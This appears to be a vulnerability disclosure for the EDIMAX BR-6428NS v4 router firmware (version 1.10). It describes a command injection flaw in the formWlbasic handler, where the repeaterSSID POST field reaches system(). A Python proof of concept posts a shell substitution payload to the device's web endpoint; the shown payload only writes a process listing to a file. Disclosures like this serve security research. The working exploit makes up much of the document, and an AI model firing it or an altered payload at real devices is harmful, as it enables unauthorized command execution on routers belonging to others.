BR-6428NS_v4_1.10
The EDIMAX BR-6428NS_v4_1.10 firmware has a command injection vulnerability in the formWlbasic function. The v30 variables receive the repeaterSSID parameters from a POST request. However, since the user can control the input of these variables, the statement system() can cause a command injection.


import requests
ip = "192.168.2.1"
payload = "$(ps>/1.txt)"
data = {
"wlan1Enable": "1",
"apMode": "0",
"band": "1",
"chan": "19",
"repeaterSSID": payload
}
url = f'http://{ip}/goform/formWlbasic'
res = requests.post(url=url, data=data, verify=False)
print(res)
